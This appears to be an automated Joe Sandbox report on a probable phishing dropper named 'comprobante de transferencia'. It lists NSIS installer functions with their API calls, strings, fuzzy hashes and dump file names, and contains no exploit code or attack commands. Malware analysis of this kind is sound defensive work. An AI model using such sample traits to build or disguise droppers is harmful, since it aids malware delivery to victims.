Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59

Uniqueness

Uniqueness Score: -1.00%

Function 00406384 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
wsprintfW.USER32 ref: 004063D6
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA

Strings

%s%S.dll, xrefs: 004063D0
\, xrefs: 004063AC
UXTHEME, xrefs: 0040638D

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
Opcode Fuzzy Hash: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403088
GetTickCount.KERNEL32 ref: 00403109
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403136
wsprintfW.USER32 ref: 00403149

Strings

... %d%%, xrefs: 00403143

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
Opcode Fuzzy Hash: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED

Uniqueness

Uniqueness Score: -1.00%

Function 00404935 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
wsprintfW.USER32 ref: 004049DF
SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2

Strings

%u.%u%s%s, xrefs: 004049C0
&B, xrefs: 004049C8

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$&B
API String ID: 3540041739-2907463167
Opcode ID: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
Opcode Fuzzy Hash: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
CharNextW.USER32(?,?,?,00000000), ref: 00406320
CharNextW.USER32(?,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
CharPrevW.USER32(?,?,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338

Strings

*?|<>/":, xrefs: 00406300

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00405648 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00436800), ref: 0040568B
GetLastError.KERNEL32 ref: 0040569F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
GetLastError.KERNEL32 ref: 004056BE

Strings

s@, xrefs: 0040567D

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: s@
API String ID: 3449924974-2533359417
Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401767 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,004095A8,004095A8,00000000,00000000,004095A8,00435000,?,?,00000031), ref: 004017CD

Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027

Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
Opcode Fuzzy Hash: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
Opcode Fuzzy Hash: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
Opcode Fuzzy Hash: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39

Uniqueness

Uniqueness Score: -1.00%

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
Opcode Fuzzy Hash: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(0040A5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
Opcode Fuzzy Hash: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628

Uniqueness

Uniqueness Score: -1.00%

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234

Part of subcall function 004056FA: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
Opcode Fuzzy Hash: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402F6A,?,?,?,00434000,00403500,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00434000,00403500,?), ref: 00402DE6

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 004050ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040511C
CallWindowProcW.USER32(?,?,?,?), ref: 0040516D

Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C

Strings

, xrefs: 004050FD

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C3C
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00434000,00403268,00436000,00436800,00436800,00436800,00436800,00436800,00436800,00403492), ref: 00405C57

Strings

nsa, xrefs: 00405C2B

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004056FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
CloseHandle.KERNEL32(?), ref: 00405730

Strings

Error launching installer, xrefs: 0040570D

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
